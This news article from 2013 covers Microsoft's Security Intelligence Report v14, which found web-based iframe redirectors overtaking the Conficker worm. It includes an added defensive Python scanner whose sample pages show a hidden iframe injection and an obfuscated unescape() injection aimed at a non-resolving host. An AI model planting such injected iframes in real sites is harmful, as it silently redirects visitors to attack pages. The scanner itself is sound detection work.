4/17/2013
06:19 PM

Microsoft: Worms And Rogue AV Dying, Web Threats Thriving

Conficker finally flickering out, newest edition of Microsoft's Security Intelligence Report (SIR) shows

For the first time in nearly four years, the top malware threat plaguing enterprises is not the Conficker worm: Web-based attacks have taken over, according to new data gathered from more than 1 billion Windows machines worldwide.

IframeRef, a generic detection for malicious iFrames injected into compromised Web pages so that visitors are silently redirected to attack sites, now holds the No. 1 spot, with a fivefold increase in the fourth quarter of 2012 alone to 3.3 million detections, according to the new Version 14 of Microsoft's Security Intelligence Report (SIR), which covers the second half of 2012.

"Conficker had been the No. 1 threat for the enterprise since we’ve been tracking domain-joined threats in [the second half of 2009]. In Q4, Conficker was significantly surpassed by IframeRef and was reflective of the overall impact of worms versus Web-based threats," says Holly Stewart, senior program manager for the Microsoft Malware Protection Center.

"The prevalence of IframeRef was a bit surprising," Stewart says. "I expected BlackHole [to be at the top]," she says. "But you're more likely to have a browser encounter with an iFrame redirector, so it really shot up over the past year."

The old mainstay worms, including Conficker and Autorun, dropped 37 percent from 2011 to the second half of 2012, mainly thanks to a second quarter 2011 update from Microsoft that restricted Autorun behavior on Windows XP and Vista, together with antivirus detections for Conficker. Stewart says Conficker had kept spreading for a while because it brute-forces weak or stolen passwords to reach network shares. "In the second quarter of 2012 is when Conficker started to decline, and this is a bit of a success story for IT pros. The changes they were making, [including] password security, are helping get rid of these worms," she says.

Even so, plenty of users still don't run up-to-date antivirus software: roughly one in four computers (2.5 out of 10) lacks current AV, Microsoft's report says, and a computer without it is 5.5 times more likely to be infected with malware.

"People intuitively understand the importance of locking their front doors to prevent their homes from being broken into. Computer security is no different. Surfing the Internet without up-to-date antivirus is like leaving your front door open to criminals," says Tim Rains, director of Trustworthy Computing at Microsoft. "With the release of this new research, Microsoft is urging people to make sure they have up-to-date antivirus installed on their computers."

Interestingly, fake antivirus infections -- most commonly a consumer problem -- also began to decline over the second half of 2012. "For the first time in many years, we see a decline in the incidence of fake AV," Stewart says.

A Web Of Threats
But when one attack vector fizzles, another ignites: Microsoft's SIR shows how Web-borne attacks are on the rise, big-time.

Microsoft's findings on Web threats jibe with Symantec's, which yesterday released its annual threat report. Symantec says Web-based attacks jumped by 30 percent last year, and the number of phishing sites posing as social networking sites grew by 125 percent as attackers set their sights on social networks.

"These attacks silently infect enterprise and consumer users when they visit a compromised website," according to Symantec's Internet Security Threat Report 2012. "These attacks are successful because enterprise and consumer systems are not up to date with the latest patches for browser plug-ins, such as Adobe’s Flash Player and Acrobat Reader as well as Oracle’s Java platform. While a lack of attentiveness can be blamed for consumers remaining out of date, often in larger companies, older versions of these plug-ins are required to run critical business systems, making it harder to upgrade to the latest versions. Such patch management predicaments, with slow patch deployment rates, make companies especially vulnerable to Web-based attacks."

Stewart says the wave of attacks during the past year that exploited SQL injection and cross-site scripting flaws in websites, and used them to plant redirectors on otherwise legitimate pages, contributed to some of the spikes in these numbers.

Seven of the 10 threats most often detected on enterprise machines have Web threat ties, Stewart notes. "They are either a Web threat themselves or are known to be delivered through a Web threat in compromised websites, malicious websites, or a combination," she says. "Two are related to iFrame redirection, which is the middleman of Web-based attacks."
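The iFrame redirector Stewart describes is the piece a defender can actually hunt for on a site suspected of compromise: a tiny or hidden iFrame pointing at a third-party host, often wrapped in document.write(unescape(...)) so a plain grep for "<iframe" misses it. The scanner below is an added example written for this article; it is not Microsoft's IframeRef detection logic nor anything from the SIR. The three page snippets and the host malicious-redirector.invalid are constructed for the demonstration (.invalid is a reserved TLD, so nothing is contacted).

```python
"""Flag IframeRef-style hidden iframe redirectors in HTML (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Inline-style tricks commonly used to keep an injected iframe out of view.
_HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
# unescape('%3Ciframe...') / decodeURIComponent(...) wrappers around a payload.
_ENCODED_PAYLOAD = re.compile(
    r"(?:unescape|decodeURIComponent)\(\s*['\"]([^'\"]+)['\"]\s*\)")


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag seen."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _decoded_layers(html):
    """Yield the raw page, then each URL-encoded payload found inside a
    JavaScript unescape()/decodeURIComponent() call, already decoded.
    The raw pass never sees the encoded iframe because HTMLParser treats
    <script> bodies as data, so the decoded pass is what catches it."""
    yield html
    for m in _ENCODED_PAYLOAD.finditer(html):
        yield unquote(m.group(1))


def _is_tiny(attrs):
    """True if width/height attributes or inline style give the frame a
    0 or 1 pixel dimension, i.e. it is not meant to be seen."""
    def px(value):
        m = re.match(r"\s*(\d+)", value)
        return int(m.group(1)) if m else None

    w, h = px(attrs.get("width", "")), px(attrs.get("height", ""))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    return re.search(r"(width|height)\s*:\s*[01](px)?\b",
                     attrs.get("style", ""), re.I) is not None


def find_suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for iframes that point off the page's own
    host AND are tiny or hidden. An off-site but visible embed (a video
    player, say) is not reported, nor is a hidden same-site frame."""
    findings = []
    for layer in _decoded_layers(html):
        collector = _IframeCollector()
        collector.feed(layer)
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = urlparse(src).hostname or page_host
            reasons = []
            if host != page_host:
                reasons.append("off-site")
            if _is_tiny(attrs):
                reasons.append("tiny")
            if _HIDDEN_STYLE.search(attrs.get("style", "")):
                reasons.append("hidden")
            if "off-site" in reasons and len(reasons) > 1:
                findings.append((src, reasons))
    return findings


# Constructed sample pages (not real captures). The site under test is
# www.example.com; the redirector host is a reserved, non-resolving name.
BENIGN_PAGE = ('<html><body><h1>News</h1>'
               '<iframe src="https://www.youtube.com/embed/abc" width="560" '
               'height="315"></iframe></body></html>')
INJECTED_PAGE = (BENIGN_PAGE.replace("</body>", "") +
                 '<iframe src="http://malicious-redirector.invalid/in.php" '
                 'width="1" height="1" style="visibility:hidden"></iframe>'
                 '</body></html>')
OBFUSCATED_PAGE = ('<html><body><p>Welcome</p><script>document.write(unescape('
                   "'%3Ciframe%20src%3D%22http%3A%2F%2Fmalicious-redirector."
                   "invalid%2Fgo%22%20width%3D%220%22%20height%3D%220%22%3E"
                   "%3C%2Fiframe%3E'))</script></body></html>")

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("injected", INJECTED_PAGE),
                       ("obfuscated", OBFUSCATED_PAGE)):
        print(name, find_suspicious_iframes(page, "www.example.com"))
```

Requiring both "off-site" and a concealment signal keeps the noise down on real sites, where hidden same-origin frames and visible third-party embeds are routine; in practice you would also allowlist the advertising and analytics hosts your site legitimately loads.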

After IframeRef, the top malware families found in enterprises in the second half of last year were, in order, Conficker, Keygen, Autorun, Blacole, BlacoleRef, Zbot, Sirefef, Dorkbot, and Pdfjsc.

The IframeRef Trojan was found in 2.3 percent of machines in the first quarter of last year, and 13.6 percent by the fourth quarter.

Microsoft's SIR v14 drew data from 1 billion computers in more than 100 countries and regions, up from 600 million machines for last year's report. The full SIR is available from Microsoft for download.


Kelly Jackson Higgins is Senior Editor at DarkReading.com.
